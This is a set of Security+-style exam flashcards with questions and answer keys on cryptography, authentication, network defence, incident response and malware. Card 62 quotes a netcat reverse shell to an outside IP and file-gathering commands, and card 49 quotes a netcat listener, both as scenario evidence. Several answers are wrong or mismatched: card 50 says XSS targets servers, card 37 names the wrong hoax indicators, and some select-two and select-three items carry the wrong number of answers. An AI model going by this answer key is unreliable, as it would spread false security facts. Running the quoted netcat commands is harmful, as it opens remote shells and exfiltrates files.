Bank 3 Flashcards
(74 cards)
1
Q
A security specialist is notified about a certificate warning that users receive when using a new internal website.After being given the URL from one of the users and seeing the warning, the security specialist insects the certificate and realizes it has been issued to the IP address, which is how the developers reach the site. Which of the following would BEST resolve the issue? A. OSCP B. OID C. PEM D. SAN
A
D. SAN
2
Q
Which of the following is a random value appended to a credential that makes the credential less susceptible to compromise when hashed? A. Nonce B. Salt C. OTP D. Block cipher E. IV3
A
B. Salt
3
Q
A systems administrator has created network file shares for each department with associated security groups for each role within the organization. Which of the following security concepts is the systems administrator implementing? A. Separation of duties B. Permission auditing C. Least privilege D. Standard naming convention
A
C. Least privilege
4
Q
Data center employees have been battling alarms in a data center that has been experiencing hotter than normal temperatures. The server racks are designed so all 48 rack units are in use, and servers are installed in any manner in which the technician can get them installed. Which of the following practices would BEST alleviate the heat issues and keep costs low? A. Utilize exhaust fan B. Use hot and cold aisles C. Air gap the racks D. Use a secondary AC unit
A
B. Use hot and cold aisles
5
Q
A company has just completed a vulnerability scan of its servers. A legacy application that monitors the HVAC system in the data center presents several challenges, as the application vendor is no longer in business. Which of the following secure network architecture concepts would BEST protect the other company servers if the legacy server were to be exploited? A. Virtualization B. Air gap C. VLAN D. Extranet
A
C. VLAN
6
Q
A company recently experienced data exfiltration via the corporate network. In response to the breach, a security analyst recommends deploying an out-of-band IDS solution. The analyst says the solution can be implemented without purchasing any additional network hardware. Which of the following solutions will be used to deploy the IDS? A. Network tap B. Network proxy C. Honeypot D. Port mirroring
A
D. Port mirroring
7
Q
A security consultant is setting up a new electronic messaging platform and wants to ensure the platform supports message integrity validation. Which of the following protocols should the consultant recommend? A. S/MIME B. DNSSEC C. RADIUS D. 802.11x
A
A. S/MIME
8
Q
Joe, a contractor, is hired by a firm to perform a penetration test against the firm’s infrastructure. When conducting the scan, he receives only the network diagram and the network list to scan against the network. Which of the following scan types is Joe performing? A. Authentication B. White box C. Automated D. Gray box
A
D. Gray box
9
Q
A technician has discovered the crypto-virus infection on a workstation that has access to sensitive remote resources. Which of the following is the immediate NEXT step the technician should take?
A. Determine the source of the virus that has infected the workstation
B. Sanitize the workstation’s internal drive
C. Reimage the workstation for normal operation
D. Disable the network connections on the workstation
A
D. Disable the network connections on the workstation
10
Q
Which of the following access management concepts is MOST closely associated with the use of a password or PIN? A. Authorization B. Authentication C. Accounting D. Identification
A
B. Authentication
11
Q
A company has a team of [penetration testers. This team has located a file on the company file server that they believe contains clear text usernames followed by a hash. Which of the following tools should the penetration testers use to learn more about the content of this file? A. Exploitation framework B. Vulnerability scanner C. Netcat D. Password cracker
A
D. Password cracker
12
Q
Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator? (SELECT TWO)
A. An attacker could potentially perform a downgrade attack
B. The connection is vulnerable to resource exhaustion
C. The integrity of the data could be at risk
D. The VPN concentrator could revert to L2TP
E. The IPSec payload is reverted to 16-bit sequence numbers
A
C. The integrity of the data could be at risk
13
Q
A security administrator is configuring a RADIUS server for wireless authentication. The configuration must ensure client credentials are encrypted end-to-end between the client and the authenticator. Which of the following protocols should be configured on the RADUIS server? (SELECT TWO) A. PAP B. MSCHAP C. PEAP D. NTLM E. SAML
A
B. MSCHAP
C. PEAP
14
Q
A company wishes to move all of its services and application to a cloud provider but wants to maintain full control of the deployment, access, and provisions of its services to its users. Which of the following BEST represents the required cloud deployment model? A. SaaS B. IaaS C. MaaS D.Hybrid E.Private
A
B. IaaS
15
Q
Ann is the IS manager for several new systems in which the classifications of the systems’ data are being decided.Ashe is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? A. Steward B. Custodian C. User D. Owner
A
D. Owner
16
Q
A new Chief Information Officer (CIO) has been reviewing the badge procedures and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? A. Physical B. Corrective C. Technical D. Administrative
A
D. Administrative
17
Q
An incident response analyst at a large corporation is reviewing proxy log data. The analyst believes a malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO). Which of the following is the best NEXT step for the analyst to take?
A. Call the CEO directly to ensure awareness of the event
B. Run a malware scan on the CEO’s workstation
C. Reimage the CEO’s workstation
D. Disconnect the CEO’s workstation from the network
A
D. Disconnect the CEO’s workstation from the network
18
Q
A security analyst monitors the syslog server and notices the following:
pinging 10.25.27.31 with 65500 bytes of data
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Which of the following attacks is occurring? A. Memory leak B. Buffer overflow C. Null pointed deference D. Integer overflow
A
B. Buffer overflow
19
Q
Hacktivist are most commonly motivated by: A. curiosity B. notoriety C. financial gain D. political cause
A
D. political cause
20
Q
A security analyst identified an SQL injection attack. Which of the following is the FIRST step in remediating the vulnerability? A. Implement stored procedures B. Implement input validations C. Implement proper error handling D. Implement a WAF
A
B. Implement input validations
21
Q
A company is performing an analysis of the corporate enterprise network with the intent of identifying any one system, person, function, or service that, when neutralized, will cause or cascade disproportionate damage to the company’s revenue, referrals, and reputation. Which of the following is an element of the BIA that this action is addressing? A. Identification of critical systems B. Single point of failure C. Value assessment D. Risk register
A
B. Single point of failure
22
Q
A stock trading company had the budget for enhancing its secondary data center approved. Since the main site is in a hurricane-affected area and the disaster recovery site is 100mi (161kn) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement? A. Hot site B. Warm site C. Cold site D. Cloud-based site
A
A. Hot site
23
Q
Which of the following is the BEST way for home users to mitigate vulnerabilities associated with loT devices on their home networks?
A. Power off the devices when they are not in use
B. Prevent loT devices from contacting the Internet directly
C. Apply firmware and software updates upon availability
D. Deploy a bastion host on the home network
A
C. Apply firmware and software updates upon availability
24
Q
A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Whichof the following commands should the security administrator implement within the script to accomplish this task?
A. arp –s 192.168.1.1 00-3a-d1-fa-b1-06
B. dig –x @192.168.1.1 mypc.comptia.com
C. nmap –A _T4 192.168.1.1
D. tcpdump –lnv host 192.168.1.1 or either 00:3a:d1:fa:b1:06
A
A. arp –s 192.168.1.1 00-3a-d1-fa-b1-06
25
```
Which of the following methods is used by internal security teams to assess the security of internally developed applications?
A. Active reconnaissance
B. Pivoting
C. White box testing
D. Persistence
```
C. White box testing
26
```
A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause?
A. Insufficient key bit length
B. Weak cipher suite
C. Unauthenticated encryption method
D. Poor implementation
```
D. Poor implementation
27
A forensics analyst is investigating a hard drive for evidence of suspected illegal activity. Which of the following should the analysts do FIRST?
A. Create a hash of the hard drive
B. Export the Internet history
C. Save a copy of the case number and date as a text file in the root directory
D. Back up the pictures directory for further inspection
A. Create a hash of the hard drive
28
Which of the following attacks can be used to exploit a vulnerability created by an untrained user?
A. A spear phishing email with file attachment
B. A DoS using loT devices
C. An evil twin wireless access point
D. A domain hijacking of a bank website
A. A spear phishing email with file attachment
29
Which of the following is an example of resource exhaustion?
A. A penetration tester requests every available IP address from a DHCP server
B. An SQL injection attack returns confidential data back to the browser
C. Server CPU utilization peaks at 100% during the reboot process
D. System requirements for a new software package recommend having 12GB of RAM, but only 8GB are available
A. A penetration tester requests every available IP address from a DHCP server
30
A small enterprise decides to implement a warm site to be available for business in case of a disaster. Which of the following BEST meets its requirements?
A. A fully operational site that has all the equipment in place and full data backup tapes on site
B. A site used for its data backup storage that houses a full-time network administrator
C. An operational site requiring some equipment to be relocated as well as data transfer to the site
D. A site with personnel requiring both equipment and data relocated there in case of disaster
C. An operational site requiring some equipment to be relocated as well as data transfer to the site
31
```
When used together, which of the following qualify as two-factor authentication?
A. Password and PIN
B. Smart card and PIN
C. Proximity care and smart card
D. Fingerprint scanner and iris scanner
```
B. Smart card and PIN
32
```
Which of the following is used to validate the integrity of data?
A. CBC
B. Blowfish
C. MD5
D. RSA
```
C. MD5
33
```
A network administrator is brute forcing accounts through a web interface, which of the following would provide the BEST defense from an account password being discovered?
A. Password history
B. Account lockout
C. Account expiration
D. Password complexity
```
B. Account lockout
34
```
An organization employee resigns without giving adequate notice. The following day, it is determined that the employee is still in possession of several company-owned mobile devices. Which of the following could have reduced the risk of this occurring? (SELECT TWO)
A. Proper off boarding procedures
B. Acceptable use policies
C. Non-disclosure agreements
D. Exit interviews
E. Background checks
F. Separation of duties
```
A. Proper off boarding procedures
| D. Exit interviews
35
```
A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor. Which of the following BEST describes this forensic concept?
A. Legal hold
B. Chain of custody
C. Order of volatility
D. Data acquisition
```
A. Legal hold
36
As part of a BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BESR help to accomplish this?
A. Require the use of an eight-character PIN
B. Implement containerization of company data
C. Require annual AUP sigh-off
D. Use geofencing tools to unlock devices while on the premises
B. Implement containerization of company data
37
Which of following are considered among the BEST indicators that a received message is a hoax? (SELECT TWO)
A. Minimal use of uppercase letters in the message
B. Warnings of monetary letters in the message
C. No valid digital signature from a known security organization
D. Claims of possible damage to computer hardware
E. Embedded URLs
A. Minimal use of uppercase letters in the message
| E. Embedded URLs
38
An organization has air gapped a critical system. Which of the following BEST describes the type of attacks that are prevented by this security measure?
A. Attacks from another local network segment
B. Attacks exploiting USB drives and removable media
C. Attacks that spy on leaked emanations or signals
D. Attacks that involve physical intrusion or theft
A. Attacks from another local network segment
39
```
Ann, a security analyst, wants to implement a secure exchange of email. Which of the following is the BEST option for Ann to implement?
A. PGP
B. HTTPS
C. WPA
D. TLS
```
A. PGP
40
A company wants to implement a wireless network with the following requirements:
* All wireless users will have a unique credential
* User certificates will not be required for authentication
* The company’s AAA infrastructure must be utilized
* Local hosts should not store authentication tokens
```
Which of the following should be used in the design to meet the requirements?
A. EAP-TLS
B. WPA
C. PSK
D. PEAP
```
D. PEAP
41
```
Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data?
A. Symmetric algorithm
B. Hash function
C. Digital signature
D. Obfuscation
```
A. Symmetric algorithm
42
A security administrator is reviewing the following configuration after receiving reports that users are unable to connect to remote websites:
10 PERMIT FROM:ANY TO:ANY PORT:80
20 PERMIT FROM:ANY TO:ANY PORT:443
30 DENY FROM:ANY TO:ANY PORT:ANY
Which of the following is the MOST secure solution the security administrator can implement to fix this issue?
A. Add the following rule to the firewall: 5 PERMIT FROM:ANY TO:ANY PORT:53
B. Replace rule number 10 with the following rule: 10 PERMIT FROM:ANY TO:ANY PORT:22
C. Insert the following rule in the firewall: 25 PERMIT FROM:ANY TO:ANY PORTS:ANY
D. Remove the following rule from the firewall: 30 DENY FROM:ANY TO:ANY PORT:ANY
A. Add the following rule to the firewall: 5 PERMIT FROM:ANY TO:ANY PORT:53
43
```
An organization’s employees currently use three different sets of credentials to access multiple internal resources.Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?
A. Transitive trust
B. Single sign-on
C. Federation
D. Secure token
```
B. Single sign-on
44
```
A security administrator wants to determine if a company’s web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scans should be conducted?
A. Non-credentialed
B. Passive
C. Port
D. Credentialed
E. Red team
F. Active
```
D. Credentialed
45
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analysts notices the following differences between the two certificate details:
```
Certificate 1
Certificate Path:
Geotrust Global CA
*.company.com
Certificate 2
Certificate Path:
*.company.com
```
Which of the following would resolve the problem?
A. Use a wildcard certificate
B. Use certificate chaining
C. Use a trust model
D. Use an extended validation certificate
B. Use certificate chaining
46
A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant configuration items. Which of the following BEST describe why this has occurred? (SELECT TWO)
A. Privileged-use credentials were used to scan the host
B. Non-applicable plugins were selected in the scan policy
C. The incorrect audit file was used
D. The output of the report contains false positives
E. The target host has been compromised
A. Privileged-use credentials were used to scan the host
| D. The output of the report contains false positives
47
```
User needs to transmit confidential information to a third party. Which of the following should be used to encrypt the message?
A. AES
B. SHA-2
C. SSL
D. RSA
```
A. AES
48
A security administrator is developing a methodology for tracking staff access to patient data. Which of the following would be the BEST method for creating audit trails for usage reports?
A. Deploy file integrity checking
B. Restrict access to the database by following the principle of least privilege
C. Implement a database activity monitoring system
D. Create automated alerts on the IDS system for the database server
C. Implement a database activity monitoring system
49
```
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output:
usera@host>history
mkdir /local/usr/bin/somedirectory
nc -1 192.168.5.1 –p 9856
ping –c 30 8.8.8.8 –s 600
rm /etc/dir2/somefile
rm –rm /etc/dir2/
traceroute 8.8.8.8
pskill pid 9487
usera@host>
Given the above output, which of the following commands would have established the questionable socket?
A. traceroute 8.8.8.8
B. ping -1 30 8.8.8.8 –s 600
C. nc -1 192.168.5.1 –p 9856
D. pskill pid 9487
```
C. nc -1 192.168.5.1 –p 9856
50
Which of the following is a major difference between XSS attacks and remote code exploits?
A. XSS attacks use machine language, while remote exploits use interpreted language
B. XSS attacks target servers, while remote code exploits target clients
C. Remote code exploits aim escalate attackers’ privileges, while XSS attacks aim to gain access only
D. Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work
B. XSS attacks target servers, while remote code exploits target clients
51
```
An organization is developing its mobile device management policies and procedures and is concerned about vulnerabilities associated with sensitive data being saved to a mobile device, as well as weak authentication when using a PIN. As part of discussions on the topic, several solutions are proposed. Which of the following controls, when required together, will address the protection of data-at-rest as well as strong authentication? (SELECT TWO)
A. Containerization
B. FDE
C. Remote wipe capability
D. MDM
E. MFA
F. OTA updates
```
B. FDE
| E. MFA
52
```
When considering loT systems, which of the following represents the GREATEST ongoing risk after vulnerability has been discovered?
A. Difficult-to-update firmware
B. Tight integration to existing systems
C. IP address exhaustion
D. Not using industry standards
```
B. Tight integration to existing systems
53
```
A systems administrator is configuring a new network switch for TACACS+ management and authentication. Which of the following must be configured to provide authentication between the switch and the TACACS+ server?
A. 802.1X
B. SSH
C. Shared secret
D. SNMPv3
E. CHAP
```
C. Shared secret
54
```
A government agency with sensitive information wants to virtualize its infrastructure. Which of the following cloud deployment models BEST fits the agency’s needs?
A. Public
B. Community
C. Private
D. Hybrid
```
C. Private
55
```
Which of the following enables sniffing attacks against a switched network?
A. ARP poisoning
B. IGMP snooping
C. IP spoofing
D. SYN flooding
```
A. ARP poisoning
56
```
Which of the following strategies helps reduce risk if a rollback is needed when upgrading a critical system platform?
A. Non-persistent configuration
B. Continuous monitoring
C. Firmware updates
D. Fault tolerance
```
A. Non-persistent configuration
57
```
An office recently completed digitizing all its paper records. Joe, the data custodian, has been tasked with the disposal of the paper files, which include:
•Intellectual property
•Payroll records
•Financial information
•Drug screening results
```
```
Which of the following is the BEST way to dispose of these items?
A. Shredding
B. Pulping
C. Deidentifying
D. Recycling
```
B. Pulping
58
```
A security engineer implements multiple technical measures to secure an enterprise network. The engineer also works with the Chief Information Officer (CIO) to implement policies to govern user behavior. Which of the following strategies is the security engineer executing?
A. Baselining
B. Mandatory access control
C. Control diversity
D. System hardening
```
C. Control diversity
| D. System hardening
59
Which of the following differentiates ARP poisoning from a MAC spoofing attack?
A. ARP poisoning uses unsolicited ARP replies
B. ARP poisoning overflows a switch’s CAM table
C. MAC spoofing uses DHCPOFFER/DHCPACK packets
D. MAC spoofing can be performed across multiple routers
D. MAC spoofing can be performed across multiple routers
60
A security analyst, who is analyzing the security of the company’s web server, receives the following output:
POST http://www.acme.com/AuthenticationServlet HTTP/1.1
Host:www.acme.com
accept: text/xm;, application/xml, application/xhtml = xml
Keep-Alive: 300
Connection: keep-alive
Referrer: http://acme.com/index.jsp
Cookie:JSESSIONID=LvzZRJJXgwyWPWEQMhS49vtW1yJdvn78CG1Kp5jTvvChDyPknm4t!
Content-type:application/x-www-form-urlencoded
Content-length:64
delegate_service=131&user=acme1&pass=test&submis=SUBMIT
Which of the following is the issue?
A. Code signing
B. Stored procedures
C. Access violations
D. Unencrypted credentials
D. Unencrypted credentials
61
```
After a series of breaches, a network administrator identified that staff recorded complex passwords in writing. The network administrator is adding multifactor authentication to the system. Which of the following should the administrator implement?
A. Hardware tokens
B. User PIN
C. Image patterns
D. Security questions
```
A. Hardware tokens
62
A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system logs,but does not find any attempted logins. The analyst then runs the diff command, comparing theC:\Windows\System32 directory and the installed cashe directory. The analyst finds a series of files that look suspicious.
One of the files contains the following commands”
md /C %TEMP%\nc –e cmd.exe 34.100.43.230
copy *.doc > %TEMP%\docfiles.zip
copy *.xls > %TEMP%\xlsfiles.zip
copy *.pdf > %TEMP%\pdffiles.zip
```
Which of the following types of malware was used?
A. Worm
B. Spyware
C. Logic bomb
D. Backdoor
```
B. Spyware
63
```
A security administrator is analyzing a user report in which the computer exhibits odd network-related outages. The administrator, however, does not see any suspicious processes running. A prior technician’s notes indicate the machine has been remediated twice, but the system still exhibits odd behavior. Files were deleted from the system recently. Which of the following is the MOST likely cause of this behavior?
A. Crypto-malware
B. Rootkit
C. Logic bomb
D. Session hijacking
```
B. Rootkit
64
```
A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?
A. Accounting
B. Authorization
C. Authentication
D. Identification
```
A. Accounting
65
A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock.Which of the following account management practices are the BEST ways to manage these accounts? (SELECT TWO)
A. Employ time-of-day restrictions
B. Employ password complexity
C. Employ a random key generator strategy
D. Employ an account expiration strategy
E. Employ a password lockout policy
A. Employ time-of-day restrictions
| D. Employ an account expiration strategy
66
A security administrator is creating a risk assessment with regard to how to harden internal communications intransit between servers. Which of the following should the administrator recommend in the report?
A. Configure IPSec in transport mode
B. Configure server-based PKI certificates
C. Configure the GRE tunnel
D. Configure a site-to-site tunnel
B. Configure server-based PKI certificates
67
```
A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicatingthat payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose theability to open files on the server. Which of the following has MOST likely occurred? (SELECT THREE)
A. Crypto-malware
B. Adware
C. Botnet attack
D. Virus
E. Ransomware
F.Backdoor
G.DDoS attack
```
A. Crypto-malware
| E. Ransomware
68
A security administrator wants to implement least privilege access for a network share that stores sensitivecompany data. The organization particularly concerned with the integrity of data and implementing discretionaryaccess control. The following controls are available:
* Read = A user can read the content of an existing file
* Write = A user can modify the content of an existing file and delete an existing file
* Create = A user can create a new file and place data within the file
```
A missing control means the user does not have that access. Which of the following configurations provides the appropriate control to support the organization’s requirements?
A. Owners: Read, Write, Create
Group Members: Read, Write
Others: Read, Create
B. Owners: Write, Create
Group Members: Read, Write, Create
Others: Read
C. Owners: Read, Write
Group Members: Read, Create
Others: Read, Create
D. Owners: Write, Create
Group Members: Read, Create
Others: Read, Write, Create
```
A. Owners: Read, Write, Create
Group Members: Read, Write
Others: Read, Create
69
```
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?
A. Non-intrusive credential scan
B. Non-intrusive non-credential scan
C. Intrusive credentialed scan
D. Intrusive non-credentialed scan
```
C. Intrusive credentialed scan
70
A hacker has a packet capture that contains:
…………….qw………………………….5
...Joe.Smith….E289F21CD33E4F57890DDEA5CF267ED2..
…Jane.Doe…..AD1FAB10D33E4F57890DDEA5CF267ED2..
……………………document.pdf………….………….9…………………
…John.Key……3374E9E7E33E4F57890DDEA5CF267ED2..
```
Which of the following tools will the hacker use against this type of capture?
A. Password cracker
B. Vulnerability scanner
C. DLP scanner
D. Fuzzer
```
A. Password cracker
71
Joe, a member of the sales team, recently logged into the company servers after midnight local time to download the daily lead form before his co-workers did. Management has asked the security team to provide a method for detecting this type of behavior without impeding the access for sales employees as the travel overseas. Which of the following would be the BEST method to achieve this objective?
A. Configure time-of-day restrictions for the sales staff
B. Install DLP software on the devices used by sales employees
C. Implement a filter on the mail gateway that prevents the lead form from being emailed
D. Create an automated alert on the SIEM for anomalous sales team activity
D. Create an automated alert on the SIEM for anomalous sales team activity
72
```
Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications?
A. Staging environment
B. Sandboxing
C. Secure baseline
D. Trusted OS
```
D. Trusted OS
73
```
A company wants to ensure users are only logging into the system from their laptops when they are on site. Which of the following would assist with this?
A. Geofencing
B. Smart cards
C. Biometrics
D. Tokens
```
A. Geofencing
74
A security administrator has completed a monthly review of DNS server query logs. The administrator notices continuous name resolution attempts from a large number of internal hosts to a single Internet addressable domain name. The security administrator then correlated those logs with the establishment or persistent TCP connections out to this domain. The connections seem to be carrying on the order of kilobytes of data per week. Which of the following is the MOST likely explanation for this anomaly?
A. An attacker is Exfiltrating large amounts of proprietary company data
B. Employees are playing multiplayer computer games
C. A worm is attempting to spread to other hosts via SMB exploits
D. Internal hosts have become members of a botnet
D. Internal hosts have become members of a botnet
